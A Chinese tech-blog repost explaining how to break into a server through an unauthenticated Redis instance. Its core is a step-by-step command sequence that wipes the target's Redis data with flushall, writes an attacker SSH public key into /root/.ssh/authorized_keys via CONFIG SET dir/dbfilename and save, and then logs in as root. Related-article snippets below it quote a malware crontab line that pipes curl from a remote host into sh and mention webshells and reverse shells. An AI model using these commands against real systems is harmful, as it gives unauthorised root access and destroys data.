通过redis入侵服务器的步骤

最新推荐文章于 2023-08-31 17:34:19 发布
转载 最新推荐文章于 2023-08-31 17:34:19 发布 · 506 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/lenglingx/blog/532185
文章标签:

#数据库 #运维 #python

本文详细介绍了如何通过Redis的默认配置漏洞实现服务器入侵的过程。包括生成SSH公钥、连接Redis、清空Redis数据库、写入公钥、修改配置文件并保存等步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥

ssh-keygen

 

二,先连接redis看看

telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

 

 

三, 清一下redis数据库

redis-cli -h 192.168.15.10 flushall

 

 

四, 向redis写自己的公钥

cat key.txt |redis-cli -h 192.168.15.10 -x set redis

 

 

五, 利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

 

 

六, 远程连接

ssh root@192.168.15.10

 

 

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。

 

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

 

转载于:https://my.oschina.net/lenglingx/blog/532185

Redis——Redis Cluster集群原理
庄小焱
03-14 5115
摘要 我们平时习惯于使用 Rabbitmq 和 Kafka 作为消息队列中间件,来给应用程序之间增加异步消息传递功能。这两个中间件都是专业的消息队列中间件,特性之多超出了大多数人的理解能力。使用过 Rabbitmq 的同学知道它使用起来有多复杂,发消息之前要创建 Exchange,再创建 Queue,还要将 Queue 和 Exchange 通过某种规则绑定起来,发消息的时候要指定 routingkey,还要控制头部信息。消费者在消费消息之前也要进行上面一系列的繁琐过程。但是绝大多数情况下,虽然我们的消息
redis crackit入侵事件总结
Lvnux的专栏
07-01 5388
今天发现服务器有异常进程/opt/yam/yam,上网搜了搜,是由于redis未授权引起的入侵,查了些资料,这里坐下总结。 1. 现象 有以下其一现象就要注意是否被入侵 crontab -l 可以看到类似“/15 * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh”。 ps -ef 可以看到进程 “/opt/yam
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6427
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写redis,然后利更改redis数据库文件配置,把数据写到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
还不重视?客可以通过Redis控制你的服务器
qq_43665434的博客
03-31 346
Redis未授权访问漏洞简单复现 前记: 我见青山多妩媚,料青山见我应如是。一杯茶一包烟,一个环境搭一天。 环境准备: 角色 主机 IP 受害服务器 centos8(安装有redis6) 192.168.1.129 攻击者 kali 192.168.1.115 首先在centos8上搭建redis服务,详情请参考文章,个人在搭建的时候遇到很多坑,希望大家按步骤认真搭建。 安装完redis6后,要配置远程连接,请参考文章。 kali中需要安装redis客户端redis-cli,请自
利用redis入侵服务器
weixin_43641575的博客
01-17 795
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写redis,然后利更改redis数据库文件配置,把数据写到认证文件。形成免密码登陆。 一,生成本地ssh公钥 ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面 二,先连接redis看看 telnet 10.10.10.102 6379...
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 7170
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
记录一次redis入侵事件(无重大影响)
大锅霍皮久的博客
04-08 7751
早上看到阿里云报警,提示”Linux系统计划任务配置文件写行为“,虽然这个reids集群做在内网,可能因为做了本地端口转发,所以导致了入侵事件。1.现象于是上服务器,crontab -l 看到有一个定时任务写在计划任务中2.分析将这个脚本下载下来进行分析,wget https://transfer.sh/Yfso3/tmp.YmboB7ymVN脚本内容如下sleep 1 find . -maxd...
记一次Redis入侵(被)处理过程
nelson的博客
05-22 3744
通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器客拿来当矿机的处理过程。 攻击的发现 之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿...
redis导致java的cpu过高,redis 漏洞造成服务器入侵-CPU飙升
weixin_39958631的博客
03-12 716
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
服务器安装redis以及遭遇问题
weixin_45757844的博客
03-01 597
服务器安装redis 安装教程有很多 此参考链接是经过多次尝试后感觉最佳的参照,完美安装! 参考链接:腾讯云服务器上安装Redis_SZ_ChenBolin的博客-优快云博客_腾讯云服务器安装redis 远程连接redis的过程出现问题 在本地redis desktop manager工具成功连上服务器redis后不超过一分钟,发现整个服务器出现了问题,cpu以及内存使用率达到了100%,通过网上了解到,有许多人在配置redis时由于漏洞遭到入侵! 问题原因: 将redis暴露在公网上,即把redis
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2287
单位ip被电信拉,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
最新发布
liuhyusb的博客
08-31 205
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
redis漏洞复现
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
03-24 2354
目录 redis准备 启动redis服务器 redis漏洞利用 写webshell 计划任务反弹shell 写公钥远程连接 主从复制RCE(Linux) 主从同步RCE漏洞复现 Windows自启动 redis密码暴力破解 由于最近github的问题,已备好 资源包 提取码:ks18 redis准备 Linux 安装: https://redis.io/download tar xzf redis-6.0.1.tar.gz cd redis-6.0.1...
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1722
3.将公钥写目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
记一次Redis漏洞导致服务器入侵以及解决的过程
orisonchan的博客
08-09 2742
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3949
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
利用Redis配置漏洞进linux服务器(被过一次,特出此警告贴)
weixin_43783160的博客
11-24 539
参考博客: http://www.zhoulingjie.com/archives/1140 漏洞描述 1、借助 redis 内置命令,可以对现有数据进行恶意清空 2、 如果 redis 以root身份运行,可往服务器上写SSH公钥文件,直接登录服务器 漏洞原理 如果redis端口对外网开放,且未配置安全密码访问(或泄露); 当 redis 以root用户身份运行时,就可以借助链接到redis,通过redis内置命令修改 dir和 dbfilename 从而可往服务器的任何位置写任何内容的文件,当
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1326
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt# re...
常见IT系统未授权漏洞风险与Redis示例
文中还提供了具体的示例,如通过wget下载Redis源码并在CentOS 7环境中进行安装和配置,这表明攻击者可能会利用这些步骤来演示或测试漏洞。在整个过程中,强调了在实际操作中必须重视访问控制和安全设置,确保服务不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值